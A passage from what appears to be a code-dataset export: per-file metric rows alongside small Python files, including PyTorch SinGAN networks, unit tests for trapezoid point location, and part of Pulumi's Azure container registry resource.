| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.333333
| 0
| 0.333333
| 0.666667
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
|
0
| 7
|
027f0e6db8094c5bdf1fe7b34fd2475508d8a18d
| 225
|
py
|
Python
|
examples/CooperativeSearch/psaltlib/Outputs/__init__.py
|
GaloisInc/salty
|
f410659b3399ad7c527513e67b06dff0332d823e
|
[
"BSD-3-Clause"
] | 13
|
2017-02-15T21:56:46.000Z
|
2022-03-23T12:59:26.000Z
|
examples/CooperativeSearch/psaltlib/Outputs/__init__.py
|
GaloisInc/salty
|
f410659b3399ad7c527513e67b06dff0332d823e
|
[
"BSD-3-Clause"
] | 17
|
2016-07-21T10:47:23.000Z
|
2020-08-07T13:26:21.000Z
|
examples/CooperativeSearch/psaltlib/Outputs/__init__.py
|
GaloisInc/salty
|
f410659b3399ad7c527513e67b06dff0332d823e
|
[
"BSD-3-Clause"
] | 2
|
2019-06-11T11:59:40.000Z
|
2022-02-09T12:48:39.000Z
|
from psaltlib.Outputs.reg1 import *
from psaltlib.Outputs.Search2 import *
from psaltlib.Outputs.Track import *
from psaltlib.Outputs.Search1 import *
from psaltlib.Outputs.reg2 import *
from psaltlib.Outputs.Return import *
| 32.142857
| 38
| 0.813333
| 30
| 225
| 6.1
| 0.333333
| 0.393443
| 0.622951
| 0.68306
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.019901
| 0.106667
| 225
| 6
| 39
| 37.5
| 0.890547
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
65efdf9fd15676c79a94685e56259780ecaf0387
| 234
|
py
|
Python
|
python/anyascii/_data/_11f.py
|
casept/anyascii
|
d4f426b91751254b68eaa84c6cd23099edd668e6
|
[
"ISC"
] | null | null | null |
python/anyascii/_data/_11f.py
|
casept/anyascii
|
d4f426b91751254b68eaa84c6cd23099edd668e6
|
[
"ISC"
] | null | null | null |
python/anyascii/_data/_11f.py
|
casept/anyascii
|
d4f426b91751254b68eaa84c6cd23099edd668e6
|
[
"ISC"
] | null | null | null |
b=' yh $ $ $ $'
| 234
| 234
| 0.012821
| 2
| 234
| 1.5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.957265
| 234
| 1
| 234
| 234
| 0.3
| 0
| 0
| 0
| 0
| 0
| 0.978723
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5a0d944420bd3b1fb4f6346dfa3d61d59ac8e537
| 98
|
py
|
Python
|
sourcecode/configs/__init__.py
|
JulianJuaner/VecFontTransfer
|
266b969878cdecc821d1d6e240e87d4caa151d84
|
[
"MIT"
] | 7
|
2021-04-12T10:48:14.000Z
|
2021-12-26T10:17:18.000Z
|
sourcecode/configs/__init__.py
|
JulianJuaner/VecFontTransfer
|
266b969878cdecc821d1d6e240e87d4caa151d84
|
[
"MIT"
] | null | null | null |
sourcecode/configs/__init__.py
|
JulianJuaner/VecFontTransfer
|
266b969878cdecc821d1d6e240e87d4caa151d84
|
[
"MIT"
] | null | null | null |
from sourcecode.configs.make_cfg import make_config
from sourcecode.configs.options import Options
| 49
| 51
| 0.887755
| 14
| 98
| 6.071429
| 0.571429
| 0.329412
| 0.494118
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.071429
| 98
| 2
| 52
| 49
| 0.934066
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
5a0f1fb69ebbcac90e007c3bc038dca6612d910e
| 48
|
py
|
Python
|
csrf/__init__.py
|
golightlyb/csrf.py
|
a182e0d6f37228f4488cbce186e0f6f132e6300c
|
[
"FSFAP"
] | 5
|
2018-07-28T22:57:24.000Z
|
2021-06-23T23:31:24.000Z
|
csrf/__init__.py
|
golightlyb/csrf.py
|
a182e0d6f37228f4488cbce186e0f6f132e6300c
|
[
"FSFAP"
] | null | null | null |
csrf/__init__.py
|
golightlyb/csrf.py
|
a182e0d6f37228f4488cbce186e0f6f132e6300c
|
[
"FSFAP"
] | 1
|
2020-01-10T10:57:04.000Z
|
2020-01-10T10:57:04.000Z
|
from .csrf import check, generate, valid, Error
| 24
| 47
| 0.770833
| 7
| 48
| 5.285714
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.145833
| 48
| 1
| 48
| 48
| 0.902439
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
5a3fb9714abdb3d202fe4f977615c77df0a0ad7e
| 49
|
py
|
Python
|
wolfgang/mozart.py
|
yoon-gu/cicd
|
c7bb44ec7e835be350f49d412f91a0ae34df8c65
|
[
"MIT"
] | null | null | null |
wolfgang/mozart.py
|
yoon-gu/cicd
|
c7bb44ec7e835be350f49d412f91a0ae34df8c65
|
[
"MIT"
] | 1
|
2021-09-11T13:22:50.000Z
|
2021-09-11T13:22:50.000Z
|
wolfgang/mozart.py
|
yoon-gu/cicd
|
c7bb44ec7e835be350f49d412f91a0ae34df8c65
|
[
"MIT"
] | null | null | null |
import sys
import os
def main():
print("hello")
| 9.8
| 15
| 0.693878
| 8
| 49
| 4.25
| 0.875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.163265
| 49
| 5
| 15
| 9.8
| 0.829268
| 0
| 0
| 0
| 0
| 0
| 0.1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0
| 0.5
| 0
| 0.75
| 0.25
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
5a6e8f8cd4a51f48f659112062535b3df3951785
| 2,395
|
py
|
Python
|
networks.py
|
MingtaoGuo/SinGAN_Pytorch
|
e27d98a39c1534bee515378523e36a02b366fd72
|
[
"MIT"
] | 4
|
2020-05-13T07:50:40.000Z
|
2020-06-15T03:14:12.000Z
|
networks.py
|
MingtaoGuo/SinGAN_Pytorch
|
e27d98a39c1534bee515378523e36a02b366fd72
|
[
"MIT"
] | null | null | null |
networks.py
|
MingtaoGuo/SinGAN_Pytorch
|
e27d98a39c1534bee515378523e36a02b366fd72
|
[
"MIT"
] | null | null | null |
import torch.nn as nn
import torch
class Generator(nn.Module):
def __init__(self, nums_block):
super(Generator, self).__init__()
self.nums_block = nums_block
self.padding = nn.ZeroPad2d(5)
self.conv1 = nn.Sequential(
nn.Conv2d(3, nums_block, 3, 1),
nn.BatchNorm2d(nums_block),
nn.LeakyReLU(0.2)
)
self.conv2 = nn.Sequential(
nn.Conv2d(nums_block, nums_block, 3, 1),
nn.BatchNorm2d(nums_block),
nn.LeakyReLU(0.2)
)
self.conv3 = nn.Sequential(
nn.Conv2d(nums_block, nums_block, 3, 1),
nn.BatchNorm2d(nums_block),
nn.LeakyReLU(0.2)
)
self.conv4 = nn.Sequential(
nn.Conv2d(nums_block, nums_block, 3, 1),
nn.BatchNorm2d(nums_block),
nn.LeakyReLU(0.2)
)
self.conv5 = nn.Sequential(
nn.Conv2d(nums_block, 3, 3, 1),
nn.Tanh()
)
def forward(self, z, x):
temp = x
x = self.padding(x+z)
x = self.conv1(x)
x = self.conv2(x)
x = self.conv3(x)
x = self.conv4(x)
res = self.conv5(x)
return res + temp
class Discriminator(nn.Module):
def __init__(self, nums_block):
super(Discriminator, self).__init__()
self.nums_block = nums_block
self.conv1 = nn.Sequential(
nn.Conv2d(3, nums_block, 3, 1),
nn.BatchNorm2d(nums_block),
nn.LeakyReLU(0.2)
)
self.conv2 = nn.Sequential(
nn.Conv2d(nums_block, nums_block, 3, 1),
nn.BatchNorm2d(nums_block),
nn.LeakyReLU(0.2)
)
self.conv3 = nn.Sequential(
nn.Conv2d(nums_block, nums_block, 3, 1),
nn.BatchNorm2d(nums_block),
nn.LeakyReLU(0.2)
)
self.conv4 = nn.Sequential(
nn.Conv2d(nums_block, nums_block, 3, 1),
nn.BatchNorm2d(nums_block),
nn.LeakyReLU(0.2)
)
self.conv5 = nn.Sequential(
nn.Conv2d(nums_block, 1, 3, 1),
)
def forward(self, x):
x = self.conv1(x)
x = self.conv2(x)
x = self.conv3(x)
x = self.conv4(x)
x = self.conv5(x)
return x
| 29.9375
| 53
| 0.502296
| 291
| 2,395
| 3.975945
| 0.127148
| 0.233362
| 0.121003
| 0.172861
| 0.821089
| 0.821089
| 0.821089
| 0.821089
| 0.708729
| 0.708729
| 0
| 0.053908
| 0.380376
| 2,395
| 80
| 54
| 29.9375
| 0.725741
| 0
| 0
| 0.621622
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.054054
| false
| 0
| 0.027027
| 0
| 0.135135
| 0
| 0
| 0
| 0
| null | 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
5a8086c7df9fd661228622dc50e228e4cd47bbcc
| 17,108
|
py
|
Python
|
unittests/test_point_location.py
|
argupta98/MotionPlanning
|
1b8454ff2b6fe797773727d8de57999a9fc68c0f
|
[
"MIT"
] | null | null | null |
unittests/test_point_location.py
|
argupta98/MotionPlanning
|
1b8454ff2b6fe797773727d8de57999a9fc68c0f
|
[
"MIT"
] | null | null | null |
unittests/test_point_location.py
|
argupta98/MotionPlanning
|
1b8454ff2b6fe797773727d8de57999a9fc68c0f
|
[
"MIT"
] | null | null | null |
import unittest
from src.point_location import *
from src.structures import *
from src.graph import *
import numpy as np
from numpy import array
from tqdm import tqdm
class TestTrapezoidRep(unittest.TestCase):
def test_three_init(self):
vertices = np.array([[10, 150], [200, 20], [200, 100]])
trap = Trapezoid(vertices, originator_vertices=[])
np.testing.assert_equal(trap.top_line, np.array([[10, 150], [200, 100]]))
np.testing.assert_equal(trap.bottom_line, np.array([[10, 150], [200, 20]]))
self.assertEqual(trap.left_p[0], 10)
self.assertEqual(trap.right_p[0], 200)
def test_four_init(self):
vertices = np.array([[10, 10], [200, 20], [200, 100], [10, 300]])
trap = Trapezoid(vertices, originator_vertices=[])
np.testing.assert_equal(trap.top_line, np.array([[10, 300], [200, 100]]))
np.testing.assert_equal(trap.bottom_line, np.array([[10, 10], [200, 20]]))
self.assertEqual(trap.left_p[0], 10)
self.assertEqual(trap.right_p[0], 200)
def test_specific_1(self):
vertices = np.array([[240., 300.],
[240., 253.33333333],
[100., 300.]])
trap = Trapezoid(vertices, originator_vertices=[])
self.assertTrue(np.allclose(trap.bottom_line, np.array([[100, 300], [240, 253.33333333333]])))
np.testing.assert_equal(trap.top_line, np.array([[100, 300], [240, 300]]))
self.assertEqual(trap.left_p[0], 100)
self.assertEqual(trap.right_p[0], 240)
def test_specific_2(self):
vertices = np.array([[353., 123.98305085],
[275., 122.],
[275., 790.],
[353., 790.]])
trap = Trapezoid(vertices, originator_vertices=[])
np.testing.assert_equal(trap.top_line, np.array([[275., 790.], [353., 790.]]))
self.assertTrue(np.allclose(trap.bottom_line, np.array([[275., 122.], [353., 123.98305085]])))
self.assertEqual(trap.left_p[0], 275)
self.assertEqual(trap.right_p[0], 353)
def test_is_left_pointed(self):
vertices = np.array([[309., 169.],
[471., 170.71247357],
[471., 69.]])
trap = Trapezoid(vertices, originator_vertices=[])
self.assertTrue(trap.is_left_pointed())
class TestTrapezoidIntersection(unittest.TestCase):
def test_left_corner(self):
vertices = np.array([[10, 150], [200, 60], [200, 10]])
trap = Trapezoid(vertices, originator_vertices=[])
edge = np.array([[10, 150], [205, 50]])
self.assertTrue(trap.is_intersected(edge))
def test_right_corner(self):
vertices = np.array([[10, 10], [10, 300], [400, 150]])
trap = Trapezoid(vertices, originator_vertices=[])
edge = np.array([[0, 100], [400, 150]])
self.assertTrue(trap.is_intersected(edge))
def test_left_of_trapezoid(self):
vertices = np.array([[10, 10], [200, 20], [200, 100], [10, 300]])
trap = Trapezoid(vertices, originator_vertices=[])
edge = np.array([[0, 100], [100, 25]])
self.assertTrue(trap.is_intersected(edge))
def test_right_of_trapezoid(self):
pass
def test_no_intersect(self):
vertices = np.array([[10, 10], [200, 20], [200, 100], [10, 300]])
trap = Trapezoid(vertices, originator_vertices=[])
edge = np.array([[0, 20], [10, 40]])
self.assertFalse(trap.is_intersected(edge))
def test_top_tangent(self):
vertices = np.array([[491., 186.],
[237., 179.],
[237., 790.],
[491., 790.]])
trap = Trapezoid(vertices, originator_vertices=[])
edge = np.array([[237, 179],
[353, 114]])
self.assertFalse(trap.is_intersected(edge))
def test_same_upper_right(self):
vertices = np.array([[295., 138.51724138],
[252., 147.4137931 ],
[252., 50.],
[295. , 60.]])
trap = Trapezoid(vertices, originator_vertices=[])
edge = np.array([[242, 60],
[295, 60]])
self.assertTrue(trap.is_intersected(edge))
class TestTrapezoidsRightAdjacent(unittest.TestCase):
def test_trapezoids_above(self):
pass
def test_trapezoids_below(self):
pass
def test_trapezoids_next_to(self):
pass
def test_failure_case(self):
triangles = [np.array([[249, 111],
[184, 172],
[311, 170]]), np.array([[261, 213],
[386, 198],
[283, 268]])]
top_triangle_edges = np.array([[[184, 172], [371, 170]],
[[184, 172], [249, 111]],
[[249, 111], [371, 170]]])
bottom_triangle_edges = np.array([[[386, 198], [283, 268]],
[[261, 213], [283, 268]],
[[261, 213], [386, 198]]])
polygons = Polygons(triangles)
bounds = [10, 10, 790, 790]
point_locator = PointLocator(bounds)
"""
for edge in np.concatenate([top_triangle_edges, bottom_triangle_edges]):
point_locator.add_line(edge)
"""
point_locator.add_line(top_triangle_edges[0])
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(10)), 1)
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(184)), 2)
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(371)), 1)
self.assertEqual(point_locator.trapezoids.trap_count(), 4)
point_locator.add_line(top_triangle_edges[1])
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(10)), 1)
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(184)), 2)
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(249)), 1)
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(371)), 1)
self.assertEqual(point_locator.trapezoids.trap_count(), 6)
point_locator.add_line(top_triangle_edges[2])
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(10)), 1)
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(184)), 2)
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(249)), 2)
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(371)), 1)
self.assertEqual(point_locator.trapezoids.trap_count(), 7)
point_locator.add_line(bottom_triangle_edges[0])
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(10)), 1)
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(184)), 2)
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(249)), 2)
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(283)), 2)
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(371)), 1)
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(386)), 1)
self.assertEqual(point_locator.trapezoids.trap_count(), 10)
point_locator.add_line(bottom_triangle_edges[1])
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(10)), 1)
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(184)), 2)
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(249)), 2)
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(261)), 2)
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(283)), 2)
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(371)), 1)
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(386)), 1)
self.assertEqual(point_locator.trapezoids.trap_count(), 12)
point_locator.add_line(bottom_triangle_edges[2])
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(10)), 1)
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(184)), 2)
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(249)), 2)
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(261)), 2)
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(283)), 2)
print(point_locator.trapezoids.right_adjacent_to(371))
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(371)), 1)
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(386)), 1)
self.assertEqual(point_locator.trapezoids.trap_count(), 13)
point_locator.remove_traps_within_polygons(polygons)
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(10)), 1)
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(184)), 2)
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(249)), 2)
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(261)), 2)
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(371)), 1)
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(283)), 1)
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(386)), 1)
class TestGraphBuilding(unittest.TestCase):
def test_random(self):
bounds = [10, 10, 790, 790]
for _ in tqdm(range(100)):
random_polygons = Polygons(Polygons.make_random(bounds, 50))
point_locator = PointLocator(bounds)
for edge in random_polygons.random_edge_sampler():
point_locator.add_line(edge)
graph = Graph(point_locator, 10)
class TestIntegration(unittest.TestCase):
def test_twotriangles(self):
bounds = [10, 10, 790, 790]
point_locator = PointLocator(bounds)
# self.assertEqual(len(point_locator.trapezoids.trapezoids), 1)
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(10)), 1)
top_triangle_edges = [np.array([[200, 100], [240, 30]]),
np.array([[200, 100], [280, 100]]),
np.array([[280, 100], [240, 30]])]
bottom_triangle_edges = [np.array([[100, 300], [400, 300]]),
np.array([[100, 300], [400, 200]]),
np.array([[400, 300], [400, 200]])]
point_locator.add_line(top_triangle_edges[0])
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(10)), 1)
sorted_traps = point_locator.trapezoids.right_adjacent_to(10)
trap_idx = sorted_traps[sorted_traps.keys()[0]].index
self.assertEqual(len(point_locator.trapezoids.right_adjacent(trap_idx)), 2)
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(200)), 2)
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(240)), 1)
self.assertEqual(point_locator.trapezoids.trap_count(), 4)
point_locator.add_line(bottom_triangle_edges[0])
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(10)), 1)
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(200)), 2)
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(100)), 2)
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(240)), 1)
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(400)), 1)
self.assertEqual(point_locator.trapezoids.trap_count(), 7)
point_locator.add_line(bottom_triangle_edges[1])
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(10)), 1)
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(200)), 2)
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(100)), 2)
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(240)), 1)
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(400)), 1)
self.assertEqual(point_locator.trapezoids.trap_count(), 8)
point_locator.add_line(top_triangle_edges[1])
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(10)), 1)
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(200)), 2)
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(100)), 2)
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(240)), 1)
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(280)), 1)
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(400)), 1)
self.assertEqual(point_locator.trapezoids.trap_count(), 10)
point_locator.add_line(top_triangle_edges[2])
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(10)), 1)
sorted_traps = point_locator.trapezoids.right_adjacent_to(10)
trap_idx = sorted_traps[sorted_traps.keys()[0]].index
self.assertEqual(len(point_locator.trapezoids.right_adjacent(trap_idx)), 2)
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(200)), 2)
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(100)), 2)
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(240)), 2)
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(280)), 1)
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(400)), 1)
def test_specific_3(self):
bounds = [10, 10, 790, 790]
point_locator = PointLocator(bounds)
edges = [np.array([[100.41771139, 497.65833091],
[193.75398968, 339.39024785]]),
np.array([[100.41771139, 497.65833091],
[168.82113323, 479.70436783]]),
np.array([[168.82113323, 479.70436783],
[193.75398968, 339.39024785]])]
point_locator.add_line(edges[0])
point_locator.add_line(edges[1])
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(168.82113323)), 1)
point_locator.trapezoids.trap_count()
# self.assertEqual(len(point_locator.trapezoids.right_adjacent(7)), 1)
point_locator.add_line(edges[2])
def test_specific_4(self):
bounds = [10, 10, 79.0, 79.0]
point_locator = PointLocator(bounds)
edges = [np.array([[27.54014023, 50.39508477],
[33.87852725, 21.53020476]]), np.array([[16.20062533, 38.51858695],
[27.54014023, 50.39508477]]), np.array([[16.20062533, 38.51858695],
[33.87852725, 21.53020476]])]
point_locator.add_line(edges[0])
point_locator.add_line(edges[1])
point_locator.trapezoids.trap_count()
point_locator.add_line(edges[2])
def test_specific_5(self):
bounds = [10, 10, 790, 790]
edges = [array([[443, 737],
[550, 780]]), array([[309, 169],
[471, 69]]), array([[309, 169],
[782, 174]]), array([[156, 719],
[550, 780]])]
point_locator = PointLocator(bounds)
point_locator.add_line(edges[0])
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(10)), 1)
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(443)), 2)
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(550)), 1)
point_locator.add_line(edges[1])
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(10)), 1)
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(309)), 2)
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(443)), 2)
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(471)), 1)
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(550)), 1)
self.assertEqual(point_locator.trapezoids.trap_count(), 7)
point_locator.add_line(edges[2])
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(10)), 1)
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(309)), 2)
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(443)), 2)
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(471)), 1)
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(550)), 1)
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(782)), 1)
self.assertEqual(point_locator.trapezoids.trap_count(), 9)
point_locator.add_line(edges[3])
def test_random(self):
bounds = [10, 10, 790, 790]
for _ in tqdm(range(100)):
random_polygons = Polygons(Polygons.make_random(bounds, 40))
point_locator = PointLocator(bounds)
for edge in random_polygons.random_edge_sampler():
point_locator.add_line(edge)
| 50.765579
| 102
| 0.645546
| 2,112
| 17,108
| 4.999527
| 0.088542
| 0.151151
| 0.208353
| 0.21735
| 0.843167
| 0.822332
| 0.778293
| 0.752344
| 0.716545
| 0.683587
| 0
| 0.102624
| 0.220248
| 17,108
| 336
| 103
| 50.916667
| 0.688906
| 0.007599
| 0
| 0.556738
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.411348
| 1
| 0.078014
| false
| 0.014184
| 0.024823
| 0
| 0.120567
| 0.003546
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
ce5a4a2c4843bea3ab6496d0c417dbf33ff59ddb
| 12,910
|
py
|
Python
|
sdk/python/pulumi_azure/containerservice/registry.py
|
kenny-wealth/pulumi-azure
|
e57e3a81f95bf622e7429c53f0bff93e33372aa1
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure/containerservice/registry.py
|
kenny-wealth/pulumi-azure
|
e57e3a81f95bf622e7429c53f0bff93e33372aa1
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure/containerservice/registry.py
|
kenny-wealth/pulumi-azure
|
e57e3a81f95bf622e7429c53f0bff93e33372aa1
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import json
import warnings
import pulumi
import pulumi.runtime
from typing import Union
from .. import utilities, tables
class Registry(pulumi.CustomResource):
admin_enabled: pulumi.Output[bool]
"""
Specifies whether the admin user is enabled. Defaults to `false`.
"""
admin_password: pulumi.Output[str]
"""
The Password associated with the Container Registry Admin account - if the admin account is enabled.
"""
admin_username: pulumi.Output[str]
"""
The Username associated with the Container Registry Admin account - if the admin account is enabled.
"""
georeplication_locations: pulumi.Output[list]
"""
A list of Azure locations where the container registry should be geo-replicated.
"""
location: pulumi.Output[str]
"""
Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
"""
login_server: pulumi.Output[str]
"""
The URL that can be used to log into the container registry.
"""
name: pulumi.Output[str]
"""
Specifies the name of the Container Registry. Changing this forces a new resource to be created.
"""
network_rule_set: pulumi.Output[dict]
"""
A `network_rule_set` block as documented below.
* `defaultAction` (`str`) - The behaviour for requests matching no rules. Either `Allow` or `Deny`. Defaults to `Allow`
* `ipRules` (`list`) - One or more `ip_rule` blocks as defined below.
* `action` (`str`) - The behaviour for requests matching this rule. At this time the only supported value is `Allow`
* `ipRange` (`str`) - The CIDR block from which requests will match the rule.
* `virtualNetworks` (`list`) - One or more `virtual_network` blocks as defined below.
* `action` (`str`) - The behaviour for requests matching this rule. At this time the only supported value is `Allow`
* `subnetId` (`str`) - The subnet id from which requests will match the rule.
"""
resource_group_name: pulumi.Output[str]
"""
The name of the resource group in which to create the Container Registry. Changing this forces a new resource to be created.
"""
sku: pulumi.Output[str]
"""
The SKU name of the the container registry. Possible values are `Classic` (which was previously `Basic`), `Basic`, `Standard` and `Premium`.
"""
storage_account: pulumi.Output[dict]
storage_account_id: pulumi.Output[str]
"""
The ID of a Storage Account which must be located in the same Azure Region as the Container Registry.
"""
tags: pulumi.Output[dict]
"""
A mapping of tags to assign to the resource.
"""
def __init__(__self__, resource_name, opts=None, admin_enabled=None, georeplication_locations=None, location=None, name=None, network_rule_set=None, resource_group_name=None, sku=None, storage_account=None, storage_account_id=None, tags=None, __props__=None, __name__=None, __opts__=None):
"""
Manages an Azure Container Registry.
> **Note:** All arguments including the access key will be stored in the raw state as plain-text.
[Read more about sensitive data in state](https://www.terraform.io/docs/state/sensitive-data.html).
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[bool] admin_enabled: Specifies whether the admin user is enabled. Defaults to `false`.
:param pulumi.Input[list] georeplication_locations: A list of Azure locations where the container registry should be geo-replicated.
